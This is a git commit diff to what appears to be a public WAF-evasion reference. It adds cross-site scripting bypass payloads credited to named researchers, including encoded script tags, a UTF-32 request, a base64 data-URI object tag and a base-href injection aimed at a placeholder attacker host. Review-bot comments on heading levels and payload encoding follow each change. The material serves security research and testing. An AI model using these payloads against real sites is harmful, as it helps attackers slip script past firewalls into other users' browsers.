Added more stuff

This commit is contained in:
0xInfection 2019-02-20 18:47:25 +05:30
parent ea9e7788dc
commit 6a7b4b0ad1


@ -1417,9 +1417,11 @@ Wanna detect WAFs? Lets see how.
</tr> </tr>
</table> </table>
## Evasion Techniques # Evasion Techniques
Lets look at some methods of bypassing and evading WAFs. Lets look at some methods of bypassing and evading WAFs.
## Cross Site Scripting:
### Fuzzing/Bruteforcing: ### Fuzzing/Bruteforcing:
#### Method: #### Method:
Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists: Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
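Review bot: promoting `## Evasion Techniques` to `# Evasion Techniques` leaves this section one level above the other sections of the file (`## Awesome Tools`, unchanged further down in this same diff, stays at `##`), so the heading hierarchy and any generated table of contents become uneven; either promote the sibling sections too or keep this one at `##` and nest the new `## Cross Site Scripting:` as `###`. On the unchanged context line, `Lets look at some methods` should read `Let's look at some methods`.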
@ -1447,7 +1449,7 @@ Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
#### Techniques: #### Techniques:
##### Keyword Filter Detection/Bypass ### Keyword Filter Detection/Bypass
__SQL Injection__ __SQL Injection__
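Review bot: changing `##### Keyword Filter Detection/Bypass` to `###` places it above its own parent `#### Techniques:` on the line immediately before it, so the keyword-filter material stops being nested under Techniques and becomes a sibling of `### Fuzzing/Bruteforcing:`. With the hierarchy introduced in this commit (`# Evasion Techniques` > `## Cross Site Scripting:` > `### Fuzzing/Bruteforcing:` > `#### Techniques:`), the level that keeps the nesting intact is the original `#####` (or `####` if `Techniques:` is dropped).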
@ -1512,7 +1514,6 @@ __Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group b
__Scenario 2: Cross Site Scripting__ __Scenario 2: Cross Site Scripting__
##### Step 1:
- Normal deliberate test: - Normal deliberate test:
``` ```
<script>alert()</script> <script>alert()</script>
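Review bot: removing `##### Step 1:` is consistent only if the later step headings of `Scenario 2: Cross Site Scripting` are removed in the same commit; if a `Step 2:` (or later) heading remains, the scenario now opens with an unnumbered test and then jumps to a numbered step. Please check the rest of this scenario's headings.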
@ -1523,6 +1524,8 @@ __Scenario 2: Cross Site Scripting__
``` ```
- Bypassing firewall regex with new line (`\r\n`): - Bypassing firewall regex with new line (`\r\n`):
``` ```
<script>\r\nalert(1)</script>
<script> <script>
alert(1)</script> alert(1)</script>
``` ```
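Review bot: the added `<script>\r\nalert(1)</script>` line shows backslash-r backslash-n as four literal characters, which on the wire is not a line break at all (and, delivered literally, `\r\nalert(1)` is not valid JavaScript, so the payload would not execute); the existing example directly below it, with a real line break between `<script>` and `alert(1)`, is the working form. Say that `\r\n` is notation for a CRLF and give the encoding actually sent in a URL parameter (`%0d%0a`), so readers do not copy the literal string into a request.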
@ -1563,10 +1566,10 @@ script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert(1)"></script a=\u0
Example request: Example request:
<pre> <pre>
GET <b>/page.php?param=∀㸀㰀script㸀alert(1)㰀/script㸀</b> HTTP/1.1 GET <b>/page.php?p=%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E</b> HTTP/1.1
Host: site.com Host: site.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
<b>Accept-Charset:utf-32, iso-8859-1;q=0.5</b> <b>Accept-Charset:utf-32; q=0.5</b>
Accept-Language: en-US,en;q=0.5 Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate Accept-Encoding: gzip, deflate
</pre> </pre>
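Review bot: the new UTF-32 request is misaligned: the query value starts with five `%00` before `%3C`, while every following character is encoded as three `%00` plus the byte (UTF-32BE, e.g. `%00%00%00s`), so there are two stray null bytes ahead of `<` and the total length is not a multiple of four. Drop the leading `%00%00` (or state that the offset is deliberate), otherwise a decoder that honours the `Accept-Charset: utf-32` hint may reject the string or shift every code point. Replacing the old glyph rendering (`∀㸀㰀script㸀...`) with percent-encoding is the right move, since that form could not be copied into a request reliably.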
@ -1684,6 +1687,11 @@ User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
### __Imperva SecureSphere__ ### __Imperva SecureSphere__
- [Imperva SecureSphere 13 - Remote Command Execution](https://www.exploit-db.com/exploits/45542) by [@rsp3ar](https://www.exploit-db.com/?author=9396) - [Imperva SecureSphere 13 - Remote Command Execution](https://www.exploit-db.com/exploits/45542) by [@rsp3ar](https://www.exploit-db.com/?author=9396)
- XSS Bypass by [@Alra3ees](https://twitter.com/alra3ees)
```
anythinglr00</script><script>alert(document.domain)</script>uxldz
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
```
- XSS Bypass by [@WAFNinja](https://waf.ninja) - XSS Bypass by [@WAFNinja](https://waf.ninja)
``` ```
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E %3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
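Review bot: the two lines in the new @Alra3ees block are one payload, first raw and then URL-encoded, but nothing says so; a short label or comment on each line would stop readers from treating them as two distinct bypasses, and would match the way the request examples earlier in the file spell out what is being sent.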
@ -1693,6 +1701,10 @@ User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';> <iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
<img/src=q onerror='new Function`al\ert\`1\``'> <img/src=q onerror='new Function`al\ert\`1\``'>
``` ```
- XSS Bypass by [@c0d3g33k](https://twitter.com/c0d3g33k)
```
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
```
- SQLi Bypass by [@DRK1WI](https://www.exploit-db.com/?author=7740) - SQLi Bypass by [@DRK1WI](https://www.exploit-db.com/?author=7740)
``` ```
15 and '1'=(SELECT '1' FROM dual) and '0having'='0having' 15 and '1'=(SELECT '1' FROM dual) and '0having'='0having'
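Review bot: the `<object data='data:text/html;;;;;base64,...'>` entry does not say what the base64 carries; it decodes to `<script>alert(1)</script>`, and the run of repeated `;` before `base64` appears to be the part the filter is expected to mishandle. Stating both inline would make this entry as self-explanatory as the other payloads in the list.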
@ -1892,6 +1904,12 @@ Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
``` ```
### __Kona SiteDefender__
- XSS Bypass by [@zseano](https://twitter.com/zseano)
```
?"></script><base%20c%3D=href%3Dhttps:\mysite>
```
## Awesome Tools ## Awesome Tools
### WAF Fingerprinting: ### WAF Fingerprinting:
__1. Fingerprinting with [NMap](https://nmap.org)__: __1. Fingerprinting with [NMap](https://nmap.org)__:
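Review bot: the new Kona SiteDefender entry needs a sentence on what the payload does and a reference to the original writeup. Decoded, `?"></script><base%20c%3D=href%3Dhttps:\mysite>` injects `<base c==href=https:\mysite>`; explain that the `c==` junk attribute in front of `href` is presumably what keeps a `<base href=` signature from matching, and that `mysite` is a placeholder the reader replaces with an attacker-controlled host. Without that, the entry is hard to reuse or verify.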